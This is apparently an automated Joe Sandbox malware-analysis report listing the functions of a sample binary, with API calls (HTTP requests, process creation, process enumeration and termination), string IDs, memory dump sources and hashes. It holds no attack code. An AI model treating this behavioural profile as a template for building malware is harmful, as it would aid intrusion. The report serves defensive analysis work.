                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: 81a7fd902a20dc4685d30670ca06bfd1e0cd770c437ed3967323266480b09bf7
                                                                        • Instruction ID: 65c4c83d929b406eedd8af2a83cc113f86d663fef30d9d8dfd1c9a57293971a8
                                                                        • Opcode Fuzzy Hash: 81a7fd902a20dc4685d30670ca06bfd1e0cd770c437ed3967323266480b09bf7
                                                                        • Instruction Fuzzy Hash: 82919230A00506AACF18EF60C481BEAFBB5BF49304F60A559E45DBB251DF30795ADBE0
                                                                        Function 00E73093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E730DC
                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00E73181
                                                                        • UnregisterHotKey.USER32(?), ref: 00E732A9
                                                                        • DestroyWindow.USER32(?), ref: 00EE5079
                                                                        • FreeLibrary.KERNEL32(?), ref: 00EE50F8
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EE5125
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 77e8b8ec758dc22a156bdcb39c8eceaefe970dce07e715a5b131934166fc0df0
                                                                        • Instruction ID: d41a13834f305f7248f888691ea928c6056c44524a279a0d64003747ce87b96d
                                                                        • Opcode Fuzzy Hash: 77e8b8ec758dc22a156bdcb39c8eceaefe970dce07e715a5b131934166fc0df0
                                                                        • Instruction Fuzzy Hash: CD9139712012468FC759EF24C895BA9F3E4FF05304F54A2A9E50EB7262DB30AE5ADF50
                                                                        Function 00E8CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E8CC15
                                                                          • Part of subcall function 00E8CCCD: GetClientRect.USER32(?,?), ref: 00E8CCF6
                                                                          • Part of subcall function 00E8CCCD: GetWindowRect.USER32(?,?), ref: 00E8CD37
                                                                          • Part of subcall function 00E8CCCD: ScreenToClient.USER32(?,?), ref: 00E8CD5F
                                                                        • GetDC.USER32 ref: 00EED137
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EED14A
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EED158
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EED16D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00EED175
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EED200
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: f40565715f7219893f49ceca490e50ba7b23245e5abbaa9c533bc11ca06392cb
                                                                        • Instruction ID: eca089fdf5223dea10bfd96d35246fc48fbd634dcee86870f2f8bf26456f0e32
                                                                        • Opcode Fuzzy Hash: f40565715f7219893f49ceca490e50ba7b23245e5abbaa9c533bc11ca06392cb
                                                                        • Instruction Fuzzy Hash: 1671F430404249DFCF21DF65CC81AEA7BB6FF49328F286269ED597A2A5D7318841DF60
                                                                        Function 00EC45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EC45FF
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EC462B
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EC466D
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EC4682
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC468F
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EC46BF
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EC4706
                                                                          • Part of subcall function 00EC5052: GetLastError.KERNEL32(?,?,00EC43CC,00000000,00000000,00000001), ref: 00EC5067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1241431887-3916222277
                                                                        • Opcode ID: 297d2121c448614b2917b2a4c3e6bb041688d213b23802b103fea823a410eeee
                                                                        • Instruction ID: 30bc898441dba885f7ecf5fb5fbd741bb436f84d2191e701f68543e28e48b046
                                                                        • Opcode Fuzzy Hash: 297d2121c448614b2917b2a4c3e6bb041688d213b23802b103fea823a410eeee
                                                                        • Instruction Fuzzy Hash: 5C417FB2501209BFEB029F50CD95FFB7BACFF09314F10501AFA05AA185D7B199458BA4
                                                                        Function 00ECB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F0DC00), ref: 00ECB715
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F0DC00), ref: 00ECB749
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00ECB8C1
                                                                        • SysFreeString.OLEAUT32(?), ref: 00ECB8EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: c4339c9245b11e50755839926cbfc66263233f7443087fd0c760414e28c8d4de
                                                                        • Instruction ID: 2f029d7e21a13f52a84e9b7f323397a05b98c3f2a8cdc2cd2ad946974286b248
                                                                        • Opcode Fuzzy Hash: c4339c9245b11e50755839926cbfc66263233f7443087fd0c760414e28c8d4de
                                                                        • Instruction Fuzzy Hash: F2F13C71A00209EFCF14DF94C985EAEB7BAFF88315F109459F945AB250DB32AE46CB50
                                                                        Function 00ED24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00ED24F5
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ED2688
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ED26AC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ED26EC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ED270E
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED286F
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00ED28A1
                                                                        • CloseHandle.KERNEL32(?), ref: 00ED28D0
                                                                        • CloseHandle.KERNEL32(?), ref: 00ED2947
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: bb23c21a54ff435882124fce79f61b84d823768c8d5d60c90a8687da900d221d
                                                                        • Instruction ID: 5ad5ea9b48828d0ef3e5e9f5ea34abd22d3827a1c47b533b3238b57b0e034407
                                                                        • Opcode Fuzzy Hash: bb23c21a54ff435882124fce79f61b84d823768c8d5d60c90a8687da900d221d
                                                                        • Instruction Fuzzy Hash: D2D1AF31604300DFCB14EF24C891A6ABBE5EF95314F14945EFA99AB3A2DB31DC42CB52
                                                                        Function 00EDB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EDB3F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 00b28a5643c25584c6e354ae609e81f48caae0eab7f9fe4cf16a0818638824c7
                                                                        • Instruction ID: 6f17dc74545c91fca142af51198a9db945b731f0da562e9563405d40a4cf8a60
                                                                        • Opcode Fuzzy Hash: 00b28a5643c25584c6e354ae609e81f48caae0eab7f9fe4cf16a0818638824c7
                                                                        • Instruction Fuzzy Hash: 21518330500204FEEB249F599C85BAE3BA5EB05328F656017F625F63E1EBB1E942DB50
                                                                        Function 00E8A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EEDB1B
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EEDB3C
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EEDB51
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EEDB6E
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EEDB95
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E8A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00EEDBA0
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EEDBBD
                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E8A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00EEDBC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                        • String ID:
                                                                        • API String ID: 1268354404-0
                                                                        • Opcode ID: 9c78a7dfd3abb24bf42d297455866b819380a721ff2ae2ddbabed81599c3aa07
                                                                        • Instruction ID: 8497c96f8fead7f0f527dd4a86727777faf5ee002dfc142518937483e7240f6f
                                                                        • Opcode Fuzzy Hash: 9c78a7dfd3abb24bf42d297455866b819380a721ff2ae2ddbabed81599c3aa07
                                                                        • Instruction Fuzzy Hash: 4D517E30604209EFEB20DF65CC81FAA3BF5BB48354F14152AF94AB7290E7B0AD50EB50
                                                                        Function 00EB7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EB5FA6,?), ref: 00EB6ED8
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EB5FA6,?), ref: 00EB6EF1
                                                                          • Part of subcall function 00EB72CB: GetFileAttributesW.KERNEL32(?,00EB6019), ref: 00EB72CC
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EB75CA
                                                                        • _wcscmp.LIBCMT ref: 00EB75E2
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00EB75FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: de28b6430c7daebbaf782cb5c802fd94f6132cf7095b9c4ee952db0c81aefac5
                                                                        • Instruction ID: cf8b2a2e290fc46a75b1d97d5732718a5641c67332c5cd4bb3c32461a9add767
                                                                        • Opcode Fuzzy Hash: de28b6430c7daebbaf782cb5c802fd94f6132cf7095b9c4ee952db0c81aefac5
                                                                        • Instruction Fuzzy Hash: A1511FB2A092299EDF64EB94D8819DE73BC9F48310F4050AAFA45F3541EA74D7C9CF60
                                                                        Function 00E8EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00E8EAEB
                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00E8EB32
                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00EEDC86
                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00EEDAD1,00000004,00000000,00000000), ref: 00EEDCF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 0d6b55e83a8c1bf033265eda326815138ab5b57a17b222fe1c81de6d524d1fce
                                                                        • Instruction ID: 2d8316005a911d5b0fccc3af3bfe09882694f9ad9c6839d592e63df91d788738
                                                                        • Opcode Fuzzy Hash: 0d6b55e83a8c1bf033265eda326815138ab5b57a17b222fe1c81de6d524d1fce
                                                                        • Instruction Fuzzy Hash: B741D67020D684DFD7396B298D8DB7ABAD6BB81318F29341DE04FB67A1C670B844D711
                                                                        Function 00EAB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB26C
                                                                        • HeapAlloc.KERNEL32(00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB273
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EAAEF1,00000B00,?,?), ref: 00EAB288
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB290
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB293
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EAAEF1,00000B00,?,?), ref: 00EAB2A3
                                                                        • GetCurrentProcess.KERNEL32(00EAAEF1,00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB2AB
                                                                        • DuplicateHandle.KERNEL32(00000000,?,00EAAEF1,00000B00,?,?), ref: 00EAB2AE
                                                                        • CreateThread.KERNEL32(00000000,00000000,00EAB2D4,00000000,00000000,00000000), ref: 00EAB2C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: bc0304e80ecef179c1c1457ebc11d7eb74dcc95cb1bd1489093cff43986c8f68
                                                                        • Instruction ID: d55fd1aabbb2fa4d0d57484490a88ae075e1f470cb5f15e8bc922d0557cfa0b4
                                                                        • Opcode Fuzzy Hash: bc0304e80ecef179c1c1457ebc11d7eb74dcc95cb1bd1489093cff43986c8f68
                                                                        • Instruction Fuzzy Hash: 5A01B6B5245308BFE710ABA6DC49F6B7FADEB89B11F018411FA05EB1A1CA759804CB61
                                                                        Function 00ECC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: 8b7cfae21c6652a4486001a47ccf60f3a2c8598565e8367edcccec55156dfd6a
                                                                        • Instruction ID: 20473feb79f1811df0fdc699590440f7a27b3e7cb6ff2d0238711823af784c0f
                                                                        • Opcode Fuzzy Hash: 8b7cfae21c6652a4486001a47ccf60f3a2c8598565e8367edcccec55156dfd6a
                                                                        • Instruction Fuzzy Hash: 58E19071A00219ABDF14DFA4CA81FEE77B5EF48714F24902DE909BB281D771AD42CB90
                                                                        Function 00ECBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: e5a17816d988c1e28e837c3e2c2b7a19b021346beaff6afcbbb6de1664abd593
                                                                        • Instruction ID: 63c2cc6049da1fb6b65dab06702e186637f5cd3fb31ff93467fc4ef7550981b6
                                                                        • Opcode Fuzzy Hash: e5a17816d988c1e28e837c3e2c2b7a19b021346beaff6afcbbb6de1664abd593
                                                                        • Instruction Fuzzy Hash: 8391AC71A00219ABCF24CFA5D945FEEBBB8EF85714F10915DF516BB280C7719942CBA0
                                                                        Function 00ED9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00ED9B19
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00ED9B2D
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00ED9B47
                                                                        • _wcscat.LIBCMT ref: 00ED9BA2
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00ED9BB9
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00ED9BE7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: c72b825900383e0c1b9e0d8375dd752b4a7574800f7ff1f5032dffa1912296e8
                                                                        • Instruction ID: a676e71ca24475f90b50abc6fdd80f37d87da9b645c99195563fa2015b13e025
                                                                        • Opcode Fuzzy Hash: c72b825900383e0c1b9e0d8375dd752b4a7574800f7ff1f5032dffa1912296e8
                                                                        • Instruction Fuzzy Hash: 0E41BD71A00308AFDB219FA4CC85BEE7BE9EF08354F10042AF549F7292C6B19D85DB64
                                                                        Function 00ED172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EB6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EB6554
                                                                          • Part of subcall function 00EB6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EB6564
                                                                          • Part of subcall function 00EB6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EB65F9
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ED179A
                                                                        • GetLastError.KERNEL32 ref: 00ED17AD
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ED17D9
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ED1855
